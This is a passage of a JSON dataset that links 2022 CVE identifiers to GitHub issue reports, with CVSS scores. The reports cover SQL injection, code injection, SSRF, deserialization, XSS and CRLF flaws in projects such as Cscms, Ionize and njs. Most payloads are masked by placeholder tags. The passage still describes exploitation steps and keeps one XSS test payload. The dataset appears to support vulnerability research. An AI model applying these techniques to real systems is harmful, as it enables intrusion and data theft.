        "description": "Blind SQL Injection Vulnerability . Description \uff08\u6f0f\u6d1e\u63cf\u8ff0\uff09 imgurl NUMBERTAG Multiple ways are used to obtain user ip \uff08\u4f7f\u7528\u4e86\u591a\u79cd\u65b9\u6cd5\u83b7\u53d6\u7528\u6237ip\uff09 FILETAG Then splice the user ip directly into the sql statement in lines NUMBERTAG to NUMBERTAG of APITAG FILETAG query >uplimit($ip) FILETAG Proof of Concept ERRORTAG FILETAG FILETAG Command for injection using sqlmap ERRORTAG FILETAG Repair method \uff08\u4fee\u590d\u65b9\u6cd5\uff09 Check user ip format or use PDO to prevent sql injection \uff08\u68c0\u67e5\u7528\u6237ip\u683c\u5f0f\u6216\u4f7f\u7528PDO\u6765\u9632\u6b62sql\u6ce8\u5165\uff09",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2022-29306",
        "Issue_Url_old": "https://github.com/ionize/ionize/issues/404",
        "Issue_Url_new": "https://github.com/ionize/ionize/issues/404",
        "Repo_new": "ionize/ionize",
        "Issue_Created_At": "2022-04-11T09:26:21Z",
        "description": "APITAG NUMBERTAG Unverified post request parameters lead to sql injection. APITAG Exploit Title: APITAG NUMBERTAG Unverified post request parameters lead to sql injection Exploit date NUMBERTAG Exploit Author: EMAILTAG Vendor Homepage: URLTAG Affect Version NUMBERTAG Description: SQL injection in Ionize CMS NUMBERTAG allows attackers to execute commands remotely via a sql injection request from client. APITAG to Exploit Construct normal packet and send. In the image below, you can see that there is a NUMBERTAG second network delay. APITAG Construct the injected data to execute APITAG . It can be found that the delay is more than NUMBERTAG seconds. It is speculated that there are NUMBERTAG records in total, so APITAG is executed NUMBERTAG times. APITAG Construct the injection again to execute APITAG , this time with a delay of APITAG seconds if the guess is correct. APITAG APITAG Validate the parameters in the post request to avoid SQL injection",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29307",
        "Issue_Url_old": "https://github.com/ionize/ionize/issues/405",
        "Issue_Url_new": "https://github.com/ionize/ionize/issues/405",
        "Repo_new": "ionize/ionize",
        "Issue_Created_At": "2022-04-11T09:45:52Z",
        "description": "APITAG NUMBERTAG Unverified post request parameters lead to code injection. APITAG Exploit Title: APITAG NUMBERTAG Unverified post request parameters lead to code injection Exploit date NUMBERTAG Exploit Author: EMAILTAG Vendor Homepage: URLTAG Affect Version NUMBERTAG Description: Code injection in Ionize CMS NUMBERTAG allows attackers to execute commands remotely via a code injection request from client. APITAG Description The exploit code is located in the project's PATHTAG file In the copy_lang_content method, the code is as follows. The POST parameter from is spliced into the function content parameter in the ERRORTAG function without any processing or checking, resulting in a code injection vulnerability APITAG APITAG to Exploit Construct the attack packet to achieve the effect of executing the whoami command. APITAG APITAG Validate the parameters in the post request to avoid Code injection",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29309",
        "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/43",
        "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/43",
        "Repo_new": "wangl1989/mysiteforme",
        "Issue_Created_At": "2022-04-06T12:00:25Z",
        "description": "An SSRF vulnerability exists in the system. The problem code Controllable URL parameters FILETAG Vulnerability validation FILETAG The DNS platform received the request. Procedure FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29334",
        "Issue_Url_old": "https://github.com/SiJiDo/H/issues/27",
        "Issue_Url_new": "https://github.com/sijido/h/issues/27",
        "Repo_new": "sijido/h",
        "Issue_Created_At": "2022-04-11T05:03:53Z",
        "description": "\u56fa\u5b9a\u7684cookie NUMBERTAG APITAG FILETAG NUMBERTAG H\u7cfb\u7edf\u7684target_ip\uff0c\u8bbf\u95ee URLTAG \uff0c\u7ed3\u679c\u5982\u56fe\uff1a FILETAG NUMBERTAG burpsuite\u62e6\u622a URLTAG APITAG FILETAG \u54cd\u5e94\u754c\u9762\u5982\u4e0b\u6240\u793a\uff08\u5373\u53ef\u6210\u529f\u767b\u5f55\uff09 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29339",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2165",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2165",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-04-08T08:28:19Z",
        "description": "Assertion failed in APITAG APITAG version info: ERRORTAG poc: poc URLTAG command: APITAG hint out /dev/null $poc$ crash: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29340",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2163",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2163",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-04-01T12:17:54Z",
        "description": "NULL Pointer Dereference still exists in APITAG version info: ERRORTAG poc: poc URLTAG command: APITAG hint out /dev/null $poc$ crash: ERRORTAG When APITAG and APITAG , APITAG will return APITAG (i.e NUMBERTAG at line NUMBERTAG of box_funcs.c. URLTAG This will cause APITAG to be set to NULL (in APITAG and the return value APITAG will be passed to the upper function ( in APITAG URLTAG The program now executes the empty if block when APITAG ( in APITAG NUMBERTAG and later dereferences the null pointer in line NUMBERTAG of isom_intern.c. URLTAG Note that although the crash path is the same as in issue NUMBERTAG their root cause is different.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29349",
        "Issue_Url_old": "https://github.com/kekingcn/kkFileView/issues/347",
        "Issue_Url_new": "https://github.com/kekingcn/kkfileview/issues/347",
        "Repo_new": "kekingcn/kkfileview",
        "Issue_Created_At": "2022-04-13T08:37:22Z",
        "description": "XSS Vulnerability. APITAG XSS Vulnerability APITAG APITAG APITAG APITAG NUMBERTAG has an XSS vulnerability, which may lead to the leakage of website cookies. \u6f0f\u6d1e\u4f4d\u7f6evulerable code location APITAG APITAG The vulnerability code is located at line NUMBERTAG in APITAG , The url parameter is user controllable, and it is output to the page without filtering special characters ERRORTAG APITAG APITAG URLTAG The version of official demo site is NUMBERTAG isit URLTAG and the concept is proofed. APITAG url parameter value needs to be base NUMBERTAG encoded and url encoded.)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29361",
        "Issue_Url_old": "https://github.com/pallets/werkzeug/issues/2420",
        "Issue_Url_new": "https://github.com/pallets/werkzeug/issues/2420",
        "Repo_new": "pallets/werkzeug",
        "Issue_Created_At": "2022-05-25T14:07:43Z",
        "description": "Question regarding CVETAG . I have a question regarding the HTTP request smuggling vulnerability CVETAG CVETAG in werkzeug. The resources provided at mitre seem not to be pointing to a fix. I tried to find a fix but was unsuccessful. Would it be possible for you to link to a fixing commit or provide a security advisory here? Thanks a lot!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29363",
        "Issue_Url_old": "https://github.com/qinggan/phpok/issues/12",
        "Issue_Url_new": "https://github.com/qinggan/phpok/issues/12",
        "Repo_new": "qinggan/phpok",
        "Issue_Created_At": "2022-04-14T07:37:26Z",
        "description": "phpok NUMBERTAG has a deserialization vulnerability, and can getshell by writing arbitrary files . The update method in the login controller of the admin module calls the decode method and calls unserialize in the decode function poc: APITAG analyze\uff1a APITAG APITAG For this payload, we can use the cache class, whose __destruct method calls the save method, and the save method can write to the webshell\uff1a APITAG The exit here can be bypassed through the pseudo protocol of php\uff1a APITAG php file successfully written and executed\uff1a APITAG When executing the following file to generate an attack chain, put FILETAG in the same directory: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29368",
        "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/896",
        "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/896",
        "Repo_new": "moddable-opensource/moddable",
        "Issue_Created_At": "2022-04-08T06:18:36Z",
        "description": "Out of bounds Read in APITAG Environment Build environment: Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Jan NUMBERTAG UTC NUMBERTAG APITAG Target device: sdk Commit: APITAG Proof of concept FILETAG ERRORTAG Analysis In file: PATHTAG CODETAG Since the offset in NUMBERTAG is controlled by attackers, this issue brings arbitrary memory read primitive. ERRORTAG In this case, rax is an out of bounds read index of the APITAG , which has the value value of APITAG . ASAN Stack dump ERRORTAG Credit P1umer( APITAG and Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29369",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/467",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/467",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-02-15T08:25:51Z",
        "description": "SEGV APITAG in njs_lvlhsh_bucket_find. Environment CODETAG Proof of concept ERRORTAG Stack dump ERRORTAG Credit Q1IQ( APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29379",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/493",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/493",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-04-13T01:20:16Z",
        "description": "APITAG njs NUMBERTAG was discovered to contain a stack buffer overflow bug in njs_default_module_loader. Description njs NUMBERTAG used in NGINX, was discovered to contain a stack buffer overflow in njs_default_module_loader ( PATHTAG ) ENV Version NUMBERTAG Commit : APITAG OS : Ubuntu NUMBERTAG Configure : CC=clang NUMBERTAG configure address sanitizer=YES BT ERRORTAG Fixed The issue was fixed in URLTAG FYI, the problem was committed in URLTAG which was not released yet.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29379",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/491",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/491",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-04-08T08:53:47Z",
        "description": "Found a possible security concern. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29498",
        "Issue_Url_old": "https://github.com/ankane/blazer/issues/392",
        "Issue_Url_new": "https://github.com/ankane/blazer/issues/392",
        "Repo_new": "ankane/blazer",
        "Issue_Created_At": "2022-04-20T21:38:03Z",
        "description": "SQL injection for certain queries with variables. Blazer queries with variables are vulnerable to SQL injection in certain cases. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact For some queries, specific variable values can modify the query rather than just the variable. This can occur if NUMBERTAG the query's data source uses different escaping than the Rails database OR NUMBERTAG the query has a variable inside a string literal Since Blazer is designed to run arbitrary queries, the impact will typically be low. Users cannot run any queries they could not have already run. However, an attacker could get a user to run a query they would not have normally run. If the data source has write permissions, this could include modifying data in some cases. Mitigation All users running an affected release should upgrade when possible. Blazer now uses parameterized queries or prepared statements for variables for a number of data sources, which mitigates the issue for their queries. Escaping has been fixed for the other data sources, but it's still possible for users to write queries that can't be escaped correctly, like APITAG . For this reason, data sources should use credentials with read only permissions. Credit Thanks to Al Chou for reporting the escaping issue.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29526",
        "Issue_Url_old": "https://github.com/golang/go/issues/52313",
        "Issue_Url_new": "https://github.com/golang/go/issues/52313",
        "Repo_new": "golang/go",
        "Issue_Created_At": "2022-04-12T20:16:17Z",
        "description": "syscall: Faccessat checks wrong group. The APITAG function checks whether the calling process can access a file. Faccessat contains a bug where it checks a file's group permission bits if the process's user is a member of the process's group rather than a member of the file's group. URLTAG CODETAG Since a process's user is usually a member of the process's group, this causes Faccessat to usually check a file's group permissions even if the process's user is not a member of the file's group. Thanks to MENTIONTAG for reporting this.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29537",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2173",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2173",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-04-16T08:01:38Z",
        "description": "FILETAG POC FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29583",
        "Issue_Url_old": "https://github.com/kardianos/service/issues/289",
        "Issue_Url_new": "https://github.com/kardianos/service/issues/289",
        "Repo_new": "kardianos/service",
        "Issue_Created_At": "2021-08-04T08:33:58Z",
        "description": "Windows service: unquoted service path can allow for privilege escalation. Hello! We use Telegraf URLTAG (which depend on this library) and our vulnerability scanner notifies us of the following vulnerability with the telegraf service: Windows Unquoted Search Path or Element can allow local privilege escalation URLTAG I did some brief digging around and I think the problem boils down to this line: URLTAG Here you take the path to the executing program (if I understood correctly) and later use it when you install the service. Doing this without adding quotes to the path means that the unquoted service path issue comes into effect. You should be able to simply add quotes to the path, and in doing to solve the issue at hand.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29622",
        "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/856",
        "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/856",
        "Repo_new": "node-formidable/formidable",
        "Issue_Created_At": "2022-05-19T05:55:03Z",
        "description": "Vulnerability CVETAG is reported by Whitesource. URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29622",
        "Issue_Url_old": "https://github.com/node-formidable/formidable/issues/862",
        "Issue_Url_new": "https://github.com/node-formidable/formidable/issues/862",
        "Repo_new": "node-formidable/formidable",
        "Issue_Created_At": "2022-05-27T14:51:41Z",
        "description": "Filename filtering is inappropriate. I came across your filename handling and filtering with the CVETAG and this issue URLTAG First you got blamed also inappropriate by this CVETAG whoever is responsible for publishing this without correct approval. Filenames of forms can have html tags and js like text, like any other form inputs and it is the responsibility of the lib user to handle this, because only he/she knows where this filename is used and what is a safety risc. All this filtering and replacement makes it worse, because the original filename of upload gets lost. Why I've opened this issue: Now your current code of __formidable__ has some filename filtering which is __dysfunctional__. This is an example you can put in e.g. URLTAG The code is from your current master FILETAG and I've added some asserts to show the problem. ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29631",
        "Issue_Url_old": "https://github.com/oblac/jodd-http/issues/9",
        "Issue_Url_new": "https://github.com/oblac/jodd-http/issues/9",
        "Repo_new": "oblac/jodd-http",
        "Issue_Created_At": "2022-04-17T16:59:28Z",
        "description": "CRLF injection vulnerability in jodd http. CRLF injection vulnerability in jodd http CRLF injection vulnerability in APITAG and APITAG in APITAG version NUMBERTAG all versions so far ) , allows remote attackers to inject arbitrary TCP payload via CRLF sequences in a URL . Proof of concept \uff1a CODETAG CODETAG run the poc , listen on APITAG FILETAG details \uff1a in APITAG when processing path \uff0c APITAG is called \uff0cand it is allowed to inject APITAG in query string and path and fragment . in APITAG , APITAG is called , and trying to build the http request payload . However , the path , query string , frament and othor components are just appended insecurely , which leads to the crlf injection . suggestion : it is recommended to urlencode the invalid characters when constructing the http request payload .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29632",
        "Issue_Url_old": "https://github.com/roncoo/roncoo-education/issues/16",
        "Issue_Url_new": "https://github.com/roncoo/roncoo-education/issues/16",
        "Repo_new": "roncoo/roncoo-education",
        "Issue_Created_At": "2022-04-18T03:18:50Z",
        "description": "There is a File upload vulnerability exists in roncoo education. APITAG description] File upload vulnerability in roncoo education. Because the identity is not authenticated in the uploadpic upload method of apiuploadcontroller, and the user is allowed to define the file suffix. APITAG Type] File upload vulnerability APITAG of Product] URLTAG APITAG Product Code Base NUMBERTAG RELEASE APITAG Component] ERRORTAG APITAG proof] Use the following HTML file to initiate the upload request CODETAG Upload any file, here my file source code is CODETAG The server returns the following data APITAG APITAG APITAG code] APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29637",
        "Issue_Url_old": "https://github.com/mindoc-org/mindoc/issues/788",
        "Issue_Url_new": "https://github.com/mindoc-org/mindoc/issues/788",
        "Repo_new": "mindoc-org/mindoc",
        "Issue_Created_At": "2022-04-24T13:42:02Z",
        "description": "There is a directory traversal vulnerability in mindoc. \u8bf7\u6309\u7167\u4e00\u4e0b\u683c\u5f0f\u63d0\u4ea4issue NUMBERTAG APITAG APITAG NUMBERTAG beta NUMBERTAG Centos NUMBERTAG zip NUMBERTAG FILETAG NUMBERTAG APITAG FILETAG APITAG After clicking upload, he will create a new APITAG in the root directory of the server APITAG APITAG code] APITAG APITAG APITAG Bingan",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29648",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/34",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/34",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2022-04-14T02:59:27Z",
        "description": "There is an xss vulnerability of HTTP header injection storage in jfinal_cms NUMBERTAG FILETAG The contents of the grab bag are as follows: FILETAG Add an X Forwarded For here and enter paylaod ( APITAG APITAG alert (\"xss\") APITAG ) FILETAG Then log in with the background administrator account to trigger the storage XSS. FILETAG Safety advice: Strictly filter the user's input Strict control of page rendering content",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-29660",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/25",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/25",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:48:07Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG First create an image and then delete it. When deleting an image, SQL injection is generated. The injection point is ID CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG Then construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29661",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/21",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/21",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:28:00Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG Add an album after the administrator logs in FILETAG CODETAG FILETAG Delete this album to the recycle bin FILETAG When deleting the album in the recycle bin, construct malicious statements to realize SQL injection CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG so construct payload to Blasting database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exist",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29662",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/17",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/17",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T01:59:58Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Administrators need to add another news after logging in.the following data package is constructed FILETAG CODETAG FILETAG Constructing malicious packets to implement SQL injection CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload FILETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code News::del FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29663",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/22",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/22",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:34:04Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG Add an album after the administrator logs in FILETAG Then delete the APITAG restoring the album in the recycle bin, construct malicious statements to realize SQL injection FILETAG CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerability exist",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29664",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/23",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/23",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:39:42Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a SQL blind injection vulnerability in APITAG There is an injection when adding an album to save, and the injection point is ID CODETAG FILETAG construct payload to blast database APITAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29665",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/19",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/19",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:15:35Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Details Add a news topic after the administrator logs in FILETAG CODETAG FILETAG When deleting news topics, malicious statements can be constructed to realize SQL injection FILETAG CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds,so construct payload to Blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the Injection vulnerability exists",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29666",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/24",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/24",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:43:26Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG The administrator needs to add a picture after logging in FILETAG construct payload CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29667",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/26",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/26",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:53:31Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG Injection occurs when restoring deleted photos from the trash CODETAG FILETAG Discovery success makes the server APITAG APITAG construct payload to blast database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29669",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/20",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/20",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-19T02:21:42Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details Injection vulnerability exists in APITAG construct payload CODETAG The injection point is ID and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
